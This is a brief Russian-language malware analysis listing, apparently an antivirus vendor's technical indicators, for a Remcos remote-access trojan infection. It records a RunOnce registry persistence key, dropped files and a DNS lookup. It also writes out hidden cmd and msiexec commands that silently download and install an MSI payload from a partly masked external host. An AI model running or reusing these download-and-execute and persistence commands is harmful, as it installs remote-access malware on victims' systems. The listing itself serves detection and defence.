Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'Dvblindesk2' = '%HOMEPATH%\Iconotyp5\PROGRAM.vbs'
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i http://ce####makmur.com/ii/remcosfire22_626.msi /quiet
- program.exe
- %HOMEPATH%\iconotyp5\program.exe
- %HOMEPATH%\iconotyp5\program.vbs
- %WINDIR%\syswow64\remos\logs.dat
- http://ce####makmur.com/ii/remcosfire22_626.msi
- http://ce####makmur.com/ii/remcosFIRE22_encrypted_3D5D660.bin
- DNS ASK ce####makmur.com
- '%WINDIR%\installer\msi95ad.tmp'
- '%HOMEPATH%\iconotyp5\program.exe'
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i http://ce####makmur.com/ii/remcosfire22_626.msi /quiet' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\msiexec.exe' /i http://ce####makmur.com/ii/remcosfire22_626.msi /quiet